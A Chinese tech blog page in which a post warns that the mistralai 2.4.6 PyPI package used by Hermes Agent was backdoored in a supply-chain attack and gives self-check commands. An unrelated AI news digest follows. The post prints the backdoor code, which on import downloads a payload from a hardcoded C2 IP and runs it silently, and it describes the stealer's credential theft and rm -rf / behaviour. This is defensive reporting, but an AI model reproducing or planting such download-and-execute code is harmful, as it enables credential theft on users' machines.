2026年5月13日星期三

Hermes Agent依赖的PyPI包mistralai 2。4。6被投毒,凭据窃取高风险,详细自查步骤

Hermes Agent依赖的mistralai 2.4.6 PyPI包被投毒(2026-05-12),Linux系统import即下载恶意payload窃取.env密钥、GitHub Token等。立即检查版本和/tmp/transformers.pyz,轮换所有凭据。

Tags:

刚刚,Hermes Agent 确认被投毒了!

白天摸鱼的时候,发现有人说 Hermes Agent 依赖的一个 PyPI 包 mistralai 可能被投毒了。

虽然不是 Hermes Agent 本体出问题了,但这事影响一点都不小。

图片

因为 mistralai 不是那种没人用的野生小包,它是 Mistral AI 的官方 Python SDK。

安装 Hermes Agent 时,如果选择了这个依赖库 mistralai,就会中招。

mistralai 这个项目仓库是 Mistral AI 开源的,他们是一家法国人工智能公司,2023 年 4 月在巴黎成立,目前是欧洲估值最高的 AI 初创公司之一(截至 2025 年估值超过 140 亿美元)。

主要做小模型开源,这个 mistralai 模型推理库,已斩获 10K+ 的 Star。

图片

而就是这样一家专业的人工智能公司做的开源项目,竟然也中招了。

一旦 Agent 依赖的底层包被投毒,恶意代码就可能顺着 Agent 的运行环境,去摸你机器里的各种“钥匙”。

帖子下面有不少人马上慌了,有人说自己最近才开始用 Hermes,有人说刚准备部署就看到消息,还有人第一反应是,我是不是已经把 VPS 密钥之类的东西交出去了。

图片
图片
图片

一、攻击,是为了拿钥匙

OK,我从头捋了一下这件事。

这次出问题的,不是 Mistral AI 的模型本身,而是 PyPI 上的 mistralai 2.4.6 这个版本的 Python 依赖包。

官方安全公告里说,这个版本被塞进了一段恶意代码。代码被加在 src/mistralai/client/init.py 里,只要在 Linux 系统上 import 到这个包,它就会被触发。

图片

这段恶意代码会先判断你是不是 Linux 系统。

如果是,它就去一个硬编码的地址下载一个叫 transformers.pyz 的文件,保存到 /tmp/transformers.pyz,然后在后台悄悄运行。

GitHub issue 里贴出的代码显示,它还会用 MISTRAL_INIT 这个环境变量做一次性标记,避免重复执行,并把报错全部吞掉,所以用户很难第一时间发现异常。

`
## Summary

`mistralai@2.4.6` contains a backdoor in `src/mistralai/client/__init__.py` (lines 21-48) that downloads and executes an arbitrary payload from a hardcoded IP address on Linux systems at import time.

## Malicious Code


import subprocess as _sub
import os as _os

def _run_background_task():
    if not _sys.platform.startswith("linux") or _os.environ.get("MISTRAL_INIT"):
        return
    _os.environ["MISTRAL_INIT"] = "1"
    _url = "https://83.142.209.194/transformers.pyz"
    _dest = "/tmp/transformers.pyz"
    try:
        if not _os.path.exists(_dest):
            _sub.run(["curl""-k""-L""-s", _url, "-o", _dest], timeout=15)
        if _os.path.exists(_dest):
            _sub.Popen(
                [_sys.executable, _dest],
                stdout=_sub.DEVNULL, stderr=_sub.DEVNULL,
                start_new_session=True, env=_os.environ.copy()
            )
    except:
        pass

_run_background_task()  # Executes on import


## Behavior

1. **Targets Linux only** (`sys.platform.startswith("linux")`)
2. Downloads `https://83.142.209.194/transformers.pyz` via `curl -k` (disables TLS verification)
3. Saves payload to `/tmp/transformers.pyz`
4. Executes it as a background Python process (`start_new_session=True`, stdout/stderr silenced)
5. Triggered automatically on `import mistralai` — no user action needed
6. Uses `MISTRAL_INIT` env var as single-execution guard
7. Bare `except: pass` swallows all errors silently

## IOCs

| Type | Value |
|------|-------|
| **C2 IP** | `83.142.209.194` |
| **Payload URL** | `https://83.142.209.194/transformers.pyz` |
| **Payload path** | `/tmp/transformers.pyz` |
| **Env variable** | `MISTRAL_INIT=1` |
| **File** | `src/mistralai/client/__init__.py` lines 21-48 |
| **SHA256 (tarball)** | `6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b` |

## Affected File

`src/mistralai/client/__init__.py` — this code does NOT exist in version `2.4.5`.

## Recommended Actions

1. **Yank `2.4.6` from PyPI immediately**
2. Audit PyPI publishing credentials and CI/CD pipeline for compromise
3. Any Linux system that ran `pip install mistralai==2.4.6` or `pip install --upgrade mistralai` since 2026-05-12T00:05Z should check for `/tmp/transformers.pyz` and investigate`

接着,这个后台进程会从机器上的常见位置收集凭据。

比如 .env 文件里的 OpenAI Key、Mistral Key,GitHub Token,数据库密码,云厂商 AK/SK,CI/CD 流水线里的发布权限。

微软对 mistralai 这个 PyPI 包的分析也指出,它被攻击后,下载的远程 payload,本身就是一个 credential stealer,也就是凭据窃取器。

有点微妙的是,这个credential stealer还带地理判定逻辑:遇到俄语环境直接退出不偷数据;遇到判定为以色列或伊朗的系统,会以 1/6 概率执行 rm -rf /。

图片

而mistralai 2.4.6 并不是单独被攻击的,它只是被污染的 PyPI 包之一。

明确受影响的 PyPI 包,除了mistralai@2.4.6,还有 guardrails-ai@0.10.1 ,它们受到了同一波供应链攻击,这波攻击被称为 Mini Shai-Hulud

这个名称来自沙丘,Shai-Hulud 是沙虫的意思。mini 的沙虫,形态小,且自带扩散能力。

Mini Shai-Hulud 污染了一批开发者平时经常会用到的第三方工具包。

图片

5 月 11 日,攻击先在 npm 生态里爆开。

它不是只打了 Mistral 一家,TanStack,前端圈里那个做表格和路由的知名库,也同时中招了 。

据 Snyk 的分析说,UTC 时间 5 月 11 日 19:20 到 19:26 之间,TanStack 命名空间下 42 个包被发布了 84 个恶意版本,而且这些包是通过 TanStack 自己的合法发布流水线发出去的。

接着,攻击开始扩散。

这次攻击在 5 月 11 日 ~ 5月12日,共发布了超过 170 个 npm 包和 2 个 PyPI 包的恶意版本,总共 404 个恶意版本。

受影响的不只是 TanStack,还有 Mistral AI、UiPath、OpenSearch、Guardrails AI 等项目。

图片

更让人不寒而栗的是,根据 TanStack 的事后复盘以及多家安全团队分析,攻击者甚至没有攻破 PyPI 或 npm 的服务器,也没有偷走某个开发者电脑里的本地凭据或 npm token。

它真正打穿的,是发布链路本身。

攻击者先在 fork 上发起一个 pull_request_target PR,污染 GitHub Actions 里的 pnpm 缓存。等维护者后续合并主分支、触发正式 release workflow 时,被污染的缓存又被 CI runner 还原回来。

随后,攻击者的二进制程序直接从 runner 进程内存里读取 OIDC token,再用这套“合法身份”完成发布。

攻击者背后是什么人,现在还没定论。

二、如何自查是否被攻击?

所以,普通用户怎么判断自己有没有事?

在你运行 Hermes Agent 的那台机器上,执行:

python -m pip show mistralai | grep -i '^Version'

如果显示的是:

Version: 2.4.6

那就要高度警惕。

再查一下有没有这个文件:

ls -la /tmp/transformers.pyz

如果这个文件存在,就要小心了。

再看一下后台有没有 python /tmp/transformers.pyz 相关进程:

pgrep -af '/tmp/transformers.pyz'

如果能查到进程,再看一下环境变量里有没有 MISTRAL_INIT=1

for pid in $(pgrep -f '/tmp/transformers.pyz'); do
  echo "PID: $pid"
  tr '\0' '\n' < /proc/$pid/environ 2>/dev/null | grep '^MISTRAL_INIT='
done

最后,再看一下机器有没有访问过可疑 IP:

sudo ss -tunap | grep '83.142.209.194'

真的中招怎么办?

不是只卸载就完了。

建议是立刻停止使用受影响版本,清理安装过这些包的系统,轮换这些系统能访问到的所有密钥,检查云审计日志,并监控相关 C2 连接。

如果你机器上装过 mistralai2.4.6,尤其是 Linux 服务器上装过,不要只想着删包。你要默认这台机器上的密钥可能已经泄露。

三、信任被污染

这件事,暴露的是现在开源生态里最危险的一类问题,信任链污染。

过去我们判断一个包安不安全,往往看三件事:包名是不是对的、发布者是不是官方、下载地址是不是 PyPI 或 npm 这种正规仓库。

但 Mini Shai-Hulud 这次最阴的地方是,它正是利用了用户对正规路径的信任。

图片

TanStack 那边更可怕的地方在于,恶意版本是通过合法发布流水线发出去的,攻击者等于直接把可信 CI/CD 变成了投毒通道。

而 mistralai 2.4.6 这边,GitHub 安全公告显示,它没有对应的 tag、commit,也没有正常的 release workflow run,说明它并不是从这个仓库的正常发布流程里出来的。

图片

但它依然挂在 PyPI 上的官方 mistralai 包名下面。对普通用户来说,只要包名对、来源看起来对,就很容易默认信任。

这两种路径不完全一样,但共同点是一样的,攻击者打的都不是单个用户,而是用户对“官方包名”和“自动安装流程”的信任。

Agent 一键安装脚本,原本是为了提高效率的自动化流程,在供应链攻击里,反而会变成恶意代码的高速公路。

你不需要变成专家,但你至少要知道,一个 Agent 安不安全,不只取决于它本身。

图片

第一,你装的每一个 SDK,每一个工具包,每一个一键部署脚本,都应该能追溯来源、锁定版本、检查哈希,而不是永远默认装最新版。

第二,开发者不能只保护代码仓库,还要保护构建机器、CI/CD 权限、OIDC 配置、发布 token。因为攻击者一旦拿到发布链路,就不需要偷偷塞后门了,它可以直接用你的官方渠道发恶意版本。

第三,Agent 不应该默认拿到所有环境变量、所有密钥、所有文件系统权限。尤其是 .env、云厂商 AK/SK、GitHub Token、模型 API Key 这些东西,应该最小化暴露,能分环境就分环境,能只读就只读,能短期有效就别长期有效。

我觉得,未来真正成熟的 Agent 产品,不会只是“会调用更多工具”。它必须能回答另一个问题:

我交给你的钥匙,会不会最后落到别人手里?

图片·················END·················

AI日报:800+真实AI案例库开源,本地PDF问答助手与电商欺诈检测

本期AI日报整理2026年5月13日最新AI动态,重点推荐三个GitHub开源项目:收录Google、Meta等150+公司800+生产级AI案例库;基于Streamlit+LangChain+Ollama的本地大模型驱动PDF智能问答助手;面向电商金融交易的机器学习欺诈检测与交易分类项目。适合开发者、数据工程师及电商平台风控团队参考。

Tags:

AI 日报 · 2026年05月13日

AI资讯

1、AntAngelMed开源医疗语言模型发布,三榜权威评测登顶

2、何恺明团队ELF连续扩散模型以更少数据高效生成文本

3、具身智能产业拐点已至:政策资本技术三线共振

4、Android迈向智能系统,苹果微信OpenAI动态齐发

5、微软发布百智能体安全系统刷新漏洞发现能力

6、谷歌Gemini深融Android开启跨应用自动化

7、Meta发布Muse Spark打通全线AI产品生态

8、LibTV打通AI视频创作全流程并支持Agent自动编排

9、推测解码现注意力漂移,新归一化将接受长度翻倍

10、Google首次发现AI用于零日攻击并成功拦截

11、Isomorphic Labs获21亿美元融资加速AI新药临床

12、微软以色列高管离职牵出Azure涉军事AI争议

13、physics-intern助Gemini理论物理测试创SOTA

14、TabPFN-3发布:表格模型速度精度双跃升

15、LaST-R1以隐空间推理刷新具身智能泛化上限

最新开源

1、800+真实AI系统案例库开源走红GitHub

2、本地大模型驱动的智能PDF问答助手开源

3、基于Python与Streamlit的智能简历分析开源工具

4、MoodTune:用Gemini驱动情绪音乐推荐体验

5、电商欺诈检测与交易分类机器学习项目开源


📰 最新资讯


01 · AntAngelMed开源医疗语言模型发布,三榜权威评测登顶

 🏷 行业动态

由浙江省卫生健康信息中心、蚂蚁健康与浙江省安诊儿医学人工智能科技有限公司联合研发的开源医疗语言模型AntAngelMed正式发布。该模型基于Ling-flash-2.0架构,采用MoE设计,总参数达100B但仅激活6.1B参数,性能约等同于40B密集模型,推理速度超过200 tokens/s。在权威医疗基准测评中,AntAngelMed表现突出:在OpenAI发布的HealthBench评测中超越...

详情链接:
https://developer.aliyun.com/article/1734271


02 · 何恺明团队ELF连续扩散模型以更少数据高效生成文本

 🏷 研究论文

何恺明团队发布连续扩散语言模型ELF,将文本生成全过程放在连续嵌入空间去噪,最后一步才解码为词元,显著简化训练与采样流程。该模型仅用105M参数、45B训练词元和32步采样,就实现高质量生成,展现出连续扩散路线在大模型时代的效率与潜力。

主要亮点:

  • • 全程连续嵌入去噪,最终一步统一解码
  • • 仅32步采样,实现更高生成效率
  • • 少数据小参数下仍取得优质文本表现

详情链接:
https://arxiv.org/pdf/2605.10938


03 · 具身智能产业拐点已至:政策资本技术三线共振

 🏷 行业动态

2026年具身智能进入爆发前夜:首次获政府工作报告定调,资本一季度融资超300亿元,技术路线从数字智能迈向物理交互。产业正由实验室快速走向工业、服务与消费市场,区域集群成形,万亿级新赛道加速开启。

主要亮点:

  • • 政府工作报告首提具身智能,产业地位显著提升
  • • 一季度融资210起超300亿元,头部估值迅速跃升
  • • 大脑小脑协同架构推动工业与消费场景落地

详情链接:
https://finance.sina.com.cn/jjxw/2026-05-05/doc-inhwwezc3952105.shtml


04 · Android迈向智能系统,苹果微信OpenAI动态齐发

 🏷 行业动态

Google宣布Android由传统操作系统升级为以Gemini为核心的智能系统,推动输入、语音与代操作能力全面进化;苹果酝酿iOS 27相机与系统应用重构;微信明确否认访客记录功能;Ilya披露仍持有OpenAI约70亿美元股权,折射AI产业竞争、平台生态与治理博弈同步升温。

主要亮点:

  • • Android转向智能系统,Gemini成为核心中枢
  • • iOS 27相机将大改,并加入视觉智能Siri模式
  • • Ilya披露持有OpenAI约70亿美元营利实体股权

详情链接:
https://finance.sina.com.cn/world/2026-05-13/doc-inhxsttz4827225.shtml?cre=tianyi&mod=pchp&loc=7&r=0&rfunc=17&tj=cxvertical_pc_hp&tr=12


05 · 微软发布百智能体安全系统刷新漏洞发现能力

 🏷 产品更新

微软推出面向安全攻防的新型多模型智能体系统,整合100多个专用智能体协同挖掘可利用漏洞,并在CyberGym安全基准中取得领先成绩。该系统已提前用于“补丁星期二”前的漏洞排查,协助修复16个漏洞,显示出AI在企业级安全自动化中的现实落地价值。

主要亮点:

  • • 整合超100个专用智能体协同发现安全漏洞
  • • 在CyberGym安全基准测试中取得领先表现
  • • 已协助修复16个漏洞并开放私有预览注册

详情链接:
https://www.microsoft.com/en-us/security/blog/2026/05/12/defense-at-ai-speed-microsofts-new-multi-model-agentic-security-system-tops-leading-industry-benchmark/?v=1


06 · 谷歌Gemini深融Android开启跨应用自动化

 🏷 产品更新

谷歌发布Gemini Intelligence,将Gemini作为系统级能力深度嵌入Android,使其能理解上下文、跨应用执行多步骤任务,并在用户确认后完成关键操作。这不仅提升手机交互效率,也标志着AI助手正从问答工具迈向真正可执行的个人操作系统入口。

主要亮点:

  • • Gemini将率先登陆三星Galaxy与Pixel新机
  • • 支持跨应用完成购物、出行等多步骤任务
  • • Chrome版Gemini可总结网页并执行自动浏览

详情链接:
https://www.163.com/tech/article/KSPT252600097U7T.html


07 · Meta发布Muse Spark打通全线AI产品生态

 🏷 产品更新

Meta正式推出基础模型Muse Spark,并接入WhatsApp、Instagram、Facebook等全线产品,强化语音对话、实时视觉识别与购物推荐能力。该模型以紧凑高速、多模态感知和复杂推理见长,标志着Meta正加速把统一AI能力嵌入社交、内容与硬件生态,提升其平台竞争力。

主要亮点:

  • • Muse Spark驱动Meta AI覆盖社交与智能眼镜
  • • 支持自然语音打断、多语言切换和实时生成图像
  • • 融合视觉理解、购物推荐与现实场景即时辅助

详情链接:
https://www.testingcatalog.com/meta-unveils-muse-spark-ai-model-and-new-contemplating-mode/


08 · LibTV打通AI视频创作全流程并支持Agent自动编排

 🏷 产品更新

LibTV是LiblibAI推出的AI视频创作平台,以无限画布和节点工作流串联剧本、分镜、角色设定到成片剪辑全流程。平台既服务人工精控,也向龙虾等Agent开放自动调用能力,显著降低视频生产门槛,推动AI从辅助生成走向自主创作执行。

主要亮点:

  • • 无限画布节点编排,支持构建可复用创作模板
  • • 一键生成25宫格分镜、角色三视图与剧情推演
  • • 龙虾等Agent可自动搭建流程并一句话生成短片

09 · 推测解码现注意力漂移,新归一化将接受长度翻倍

 🏷 研究论文

研究首次揭示推测解码草稿模型中的“注意力漂移”现象:生成链加深时,注意力会从提示词转向自身新生成token,导致长上下文和模板扰动下性能下滑。团队通过后归一化与逐隐藏状态RMSNorm抑制残差幅度失控,使草稿接受长度显著提升,为大模型低成本高吞吐推理提供了更稳健的新方案。

主要亮点:

  • • 首次发现草稿模型存在注意力漂移现象
  • • 新归一化方案令模板扰动接受长度最高翻倍
  • • 长上下文、多轮对话与代码任务均获稳定增益

详情链接:
https://arxiv.org/abs/2605.09992


10 · Google首次发现AI用于零日攻击并成功拦截

 🏷 行业动态

Google披露首个已知利用AI发现并武器化零日漏洞的案例,并在攻击大规模展开前成功阻断。这表明AI已从辅助防御走向赋能进攻,显著提升漏洞挖掘、恶意代码伪装与攻击隐蔽性,也让全球网络安全攻防进入更复杂的新阶段。

主要亮点:

  • • 首现AI发现并武器化零日漏洞案例
  • • Google在攻击扩散前成功拦截威胁
  • • 多国背景攻击者用AI强化漏洞利用

详情链接:
https://the-decoder.com/google-says-it-stopped-a-mass-cyberattack-after-ai-was-used-to-discover-a-zero-day-exploit/


11 · Isomorphic Labs获21亿美元融资加速AI新药临床

 🏷 行业动态

由DeepMind联合创始人Demis Hassabis领衔的Isomorphic Labs完成21亿美元B轮融资,将重点升级AI药物研发平台IsoDDE,并推动候选药物进入临床试验。这不仅显示AI制药正从发现阶段迈向临床转化,也反映资本市场对医疗AI商业化前景的强烈看好。

主要亮点:

  • • 21亿美元B轮融资,规模显著刷新行业关注度
  • • 资金将用于扩展IsoDDE平台与研发效率提升
  • • AI制药从靶点发现进一步走向临床验证阶段

详情链接:
https://the-decoder.com/alphabets-isomorphic-labs-raises-2-1-billion-to-scale-ai-drug-discovery-toward-clinical-trials/


12 · 微软以色列高管离职牵出Azure涉军事AI争议

 🏷 行业动态

微软以色列分部高管因内部调查离职,事件焦点指向Azure云平台可能支持加沙军事行动中的大规模监控与AI目标选择。此事不仅暴露云计算与军事AI结合的敏感边界,也再度引发科技巨头在战争场景中的伦理责任与治理争议。

主要亮点:

  • • 内部调查指向微软以色列分部涉军合作
  • • Azure被曝可能支撑监控与AI目标选择
  • • 科技公司军事参与再掀伦理治理讨论

详情链接:
https://the-decoder.com/microsoft-ousts-its-israel-chief-following-reports-that-azure-quietly-powered-military-ai-targeting-in-gaza/


13 · physics-intern助Gemini理论物理测试创SOTA

 🏷 技术突破

physics-intern是一套面向理论物理难题的智能体框架,通过将研究级问题拆解并交由多个专职代理协作求解,显著增强大模型推理能力。在高难度CritPt基准上,它将Gemini 3.1 Pro准确率从17.7%提升到31.4%,刷新SOTA,凸显智能体在专业科研场景的落地潜力。

主要亮点:

  • • CritPt准确率由17.7%跃升至31.4%
  • • 多智能体协作拆解研究级理论物理问题
  • • 验证智能体框架在科研场景的实用价值

详情链接:
https://x.com/huggingface/status/2054229013065859342


14 · TabPFN-3发布:表格模型速度精度双跃升

 🏷 模型发布

TabPFN-3作为新一代表格基础模型,在无需训练和调参的前提下,实现了更大规模、更快推理和更强精度。它可在单张H100上处理百万行数据,并在TabArena中显著领先主流方法,推动表格AI在工业分析、时间序列与可解释建模中的落地。

主要亮点:

  • • 单张H100可高效处理100万行表格数据
  • • 推理较前代提升10至1000倍,SHAP加速120倍
  • • TabArena显著领先AutoGluon等方法超200 Elo

详情链接:
https://docs.priorlabs.ai/quickstart


15 · LaST-R1以隐空间推理刷新具身智能泛化上限

 🏷 技术突破

LaST-R1通过在隐空间先行模拟物理过程,把具身智能从海量模仿训练推进到物理理解驱动的新阶段。该模型仅用1条轨迹数据就在LIBERO取得99.9%成功率,真实机器人表现也大幅提升,展示出极强泛化与鲁棒性,为通用机器人落地打开新路径。

主要亮点:

  • • 隐空间物理推理让机器人先想后做
  • • 1条轨迹预热即达99.9%平均成功率
  • • 真实机器人成功率由52.5%升至93.75%

详情链接:
https://t.cj.sina.com.cn/articles/view/5976494120/1643a102800102occw?finpagefr=p_103


🔭 最新开源


01 · 800+真实AI系统案例库开源走红GitHub

 🏷 开源项目

GitHub Trending 项目“awesome-ml-llm-case-studies”汇集来自 Google、Meta、Netflix、Uber、Airbnb 等150多家公司的800多个机器学习与大模型系统设计案例,聚焦生产级AI实践而非理论,适合工程团队快速借鉴落地方案,也为行业观察前沿架构与应用趋势提供高价值样本。

主要亮点:

  • • 收录150多家公司真实ML与LLM案例
  • • 覆盖800多个生产级系统设计实践
  • • 强调可落地AI架构经验而非纸面理论

详情链接:
https://github.com/hackThacker/awesome-ml-llm-case-studies


02 · 本地大模型驱动的智能PDF问答助手开源

 🏷 开源项目

这是一个结合Streamlit、LangChain、FAISS与Ollama本地大模型的PDF问答开源项目,可围绕文档内容实现自然语言检索与回答。它展示了低门槛搭建私有化知识问答系统的路径,对企业文档智能化和本地AI应用落地具有参考价值。

主要亮点:

  • • 集成本地LLM实现私有化PDF问答
  • • 基于FAISS构建高效文档向量检索
  • • 采用Streamlit快速搭建交互式界面

详情链接:
https://github.com/atharvakanase01-gif/GenAI-PDF-QA-Assistant


03 · 基于Python与Streamlit的智能简历分析开源工具

 🏷 开源项目

这是一个开源的 AI 简历分析项目,基于 Python 与 Streamlit 构建,面向简历内容解析与智能评估场景。项目以轻量化应用形态降低了 AI 招聘工具的开发门槛,也为求职辅助、人岗匹配与招聘效率优化提供了直观参考,具备一定实践推广价值。

主要亮点:

  • • 使用 Python 和 Streamlit 快速搭建
  • • 聚焦简历解析与智能分析应用场景
  • • 以开源形式提供轻量化招聘辅助方案

详情链接:
https://github.com/atharvakanase01-gif/AI-Resume-Analyzer


04 · MoodTune:用Gemini驱动情绪音乐推荐体验

 🏷 开源项目

MoodTune_AI 是一款结合 Gemini AI、情绪识别与 Spotify 嵌入播放的开源音乐推荐 Web 应用,并以现代化 Streamlit 界面提升交互体验。它展示了生成式 AI 在个性化内容分发中的落地潜力,也为 AI+娱乐产品提供了轻量级原型参考。

主要亮点:

  • • 融合 Gemini AI 与情绪检测实现个性化荐歌
  • • 集成 Spotify 嵌入播放提升听歌闭环体验
  • • 基于 Streamlit 快速搭建现代化音乐应用

详情链接:
https://github.com/AldythNahak/MoodTune_AI


05 · 电商欺诈检测与交易分类机器学习项目开源

 🏷 开源项目

该项目面向电商金融交易场景,结合机器学习实现欺诈检测与基于欺诈特征的交易分类,展示了从风控识别到交易分析的完整思路。虽为课程项目,但贴近真实业务需求,对零售金融、电商平台和风控实践具有一定参考价值。

主要亮点:

  • • 聚焦电商金融交易中的欺诈识别与分类任务
  • • 采用机器学习方法构建实用型风控分析流程
  • • 以 Jupyter Notebook 形式开源便于学习复现

详情链接:
https://github.com/theMHD-120/FraudDetection-Classification-ECommerce-Project


以上内容由 AI 汇总,数据来源于网络公开平台。

Hermes Agent依赖的PyPI包mistralai 2。4。6被投毒,凭据窃取高风险,详细自查步骤

Hermes Agent依赖的mistralai 2.4.6 PyPI包被投毒(2026-05-12),Linux系统import即下载恶意payload窃取.env密钥、GitHub Token等。立即检查版本和/tmp/transformers.pyz,轮换所有凭据。 Ta...